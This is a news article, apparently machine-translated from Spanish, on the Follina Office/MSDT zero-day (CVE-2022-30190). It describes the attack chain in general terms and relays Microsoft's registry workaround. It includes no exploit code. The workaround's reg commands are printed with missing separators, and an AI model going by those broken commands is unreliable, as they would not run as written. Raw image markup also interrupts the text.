Cybercriminals are exploiting a Day Zero vulnerability, dubbed Follina, that allows them to remotely execute code in the Microsoft Office suite.
vulnerability CVE-2022-30190which experts call Follina, has been detected in the Microsoft Support Diagnostic Tool (MSDT) URL protocol and affects the Microsoft Office office suite.
Is regarding a zero-day vulnerability which can act, even if the macros are disabled.
Its discovery is due to a nao_sec research team following viewing a Word document uploaded to VirusTotal from an IP address located in Belarus. However, more malicious samples dated last April have also been found, which implies that this vulnerability might have been exploited for more than a month.
This initially led to the belief that it might be a vulnerability in Word, since the exploit original was in this document format. However, researcher Kevin Beaumont’s analysis determined that the exploit took advantage Word’s remote template feature to retrieve an HTML file from a remote server.
Once successful, it used the ms-msdt URL scheme to execute the malicious code and a script de PowerShell.
With them, cyber attackers execute PowerShell commands with the MSDT tool that bypasses Windows Defender detection and a series of instructions are grouped into a command to perform a task automatically.
As Eusebio Nieva, technical director of Check Point Software for Spain and Portugal, points out, “the problem is in the MSDT, which is software that helps solve problems, but to which you can add a link to that product within the documents of Office, especially in Word. Therefore, the attack is yes it is not a vulnerability of Word but of this product ».
In this sense, the person in charge highlights that, being able to make a reference with a URL to the product, which makes it widely used and so serious.
Office as an attack surface
In this way, any document that a user downloads from the Internet might be used to attack using this vulnerability. And it shouldn’t necessarily be Word, but any other part of the Office package.
<img data-attachment-id="7422" data-permalink="https://bitlifemedia.com/2022/06/follina-la-nueva-vulnerabilidad-de-dia-cero-que-afecta-a-office/follina-microsof-office-word-ataque-dia-cero-noticia-bit-life-media/" data-orig-file="https://bitlifemedia.com/wp-content/uploads/2022/06/Follina-Microsof-Office-Word-ataque-dia-cero-noticia-bit-life-media.jpg" data-orig-size="640,591" data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"1"}" data-image-title="Follina Microsof Office Word ataque día cero noticia bit life media" data-image-description="
Follina Microsof Office Word zero day attack news bit life media.jpg
” data-image-caption=”” data-medium-file=”https://bitlifemedia.com/wp-content/uploads/2022/06/Follina-Microsof-Office-Word-ataque-dia-cero-noticia-bit-life-media-300×277.jpg” data-large-file=”https://bitlifemedia.com/wp-content/uploads/2022/06/Follina-Microsof-Office-Word-ataque-dia-cero-noticia-bit-life-media.jpg” class=”aligncenter wp-image-7422 size-full jetpack-lazy-image” alt=”Follina Microsof Office Word ataque día cero noticia bit life media.jpg” width=”640″ height=”591″ srcset=”https://bitlifemedia.com/wp-content/uploads/2022/06/Follina-Microsof-Office-Word-ataque-dia-cero-noticia-bit-life-media.jpg 640w, https://bitlifemedia.com/wp-content/uploads/2022/06/Follina-Microsof-Office-Word-ataque-dia-cero-noticia-bit-life-media-300×277.jpg 300w, https://bitlifemedia.com/wp-content/uploads/2022/06/Follina-Microsof-Office-Word-ataque-dia-cero-noticia-bit-life-media-455×420.jpg 455w” data-lazy-sizes=”(max-width: 640px) 100vw, 640px” src=”https://bitlifemedia.com/wp-content/uploads/2022/06/Follina-Microsof-Office-Word-ataque-dia-cero-noticia-bit-life-media.jpg?is-pending-load=1″/><img data-attachment-id="7422" data-permalink="https://bitlifemedia.com/2022/06/follina-la-nueva-vulnerabilidad-de-dia-cero-que-afecta-a-office/follina-microsof-office-word-ataque-dia-cero-noticia-bit-life-media/" data-orig-file="https://bitlifemedia.com/wp-content/uploads/2022/06/Follina-Microsof-Office-Word-ataque-dia-cero-noticia-bit-life-media.jpg" data-orig-size="640,591" data-comments-opened="1" data-image-meta="{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"1"}" data-image-title="Follina Microsof Office Word ataque día cero noticia bit life media" data-image-description="
Follina Microsof Office Word zero day attack news bit life media.jpg
” data-image-caption=”” data-medium-file=”https://bitlifemedia.com/wp-content/uploads/2022/06/Follina-Microsof-Office-Word-ataque-dia-cero-noticia-bit-life-media-300×277.jpg” data-large-file=”https://bitlifemedia.com/wp-content/uploads/2022/06/Follina-Microsof-Office-Word-ataque-dia-cero-noticia-bit-life-media.jpg” class=”aligncenter wp-image-7422 size-full” src=”https://bitlifemedia.com/wp-content/uploads/2022/06/Follina-Microsof-Office-Word-ataque-dia-cero-noticia-bit-life-media.jpg” alt=”Follina Microsof Office Word ataque día cero noticia bit life media.jpg” width=”640″ height=”591″ srcset=”https://bitlifemedia.com/wp-content/uploads/2022/06/Follina-Microsof-Office-Word-ataque-dia-cero-noticia-bit-life-media.jpg 640w, https://bitlifemedia.com/wp-content/uploads/2022/06/Follina-Microsof-Office-Word-ataque-dia-cero-noticia-bit-life-media-300×277.jpg 300w, https://bitlifemedia.com/wp-content/uploads/2022/06/Follina-Microsof-Office-Word-ataque-dia-cero-noticia-bit-life-media-455×420.jpg 455w” sizes=”(max-width: 640px) 100vw, 640px”/>
Embedding that link to that vulnerability in MSDT runs a PowerShell or downloads stuff. “It is what is called the first infection vector, that is, it uses this vulnerability so that, for the first time, you download a small malicious software that, in turn, already does everything else such as downloading the rest, starting to infect , etc.”.
The tests carried out indicate that the exploit works on versions of Office 2013, 2016, 2019, 2021, Office ProPlus, and Office 365.
However, Beaumont points to a greater severity of the issue since the vulnerability, although it affects Office, although it is not Office, can be executed from other Windows applications such as Outlook.
As Nieva points out, “the problem we have is that this first infection vector can be used to infect by Emotet or by any kind of ransomware. We can detect who is infected but the infection vectors can be multiple, and this might be one of them.”
In this sense, the person in charge of Check Point Software points out that a worrying point is that it is an easy vulnerability to exploit and the attack surface is everyone who has Office.
Waiting to find a solution, from Microsoft they advise disable all MSDT protocol on the system to prevent other applications from automatically calling the MSDT troubleshooter.
To do this, run the command prompt as an administrator, make a backup copy of the registry key by running the command “reg export HKEY_CLASSES_ROOTms-msdt/ filename”. Once done, the command “reg delete HKEY_CLASSES_ROOTms-msdt/f” should be executed.
However, Microsoft will have to make a move and fix the vulnerability in MSDT, something that is expected to be as fast as possible to avoid the proliferation of damage.
:quality(70):focal(2289x880:2299x890)/cloudfront-eu-central-1.images.arcpublishing.com/liberation/6D2OPAUHKZF7NO3RR6LGJKU4KA.jpg?fit=300%2C300&ssl=1)
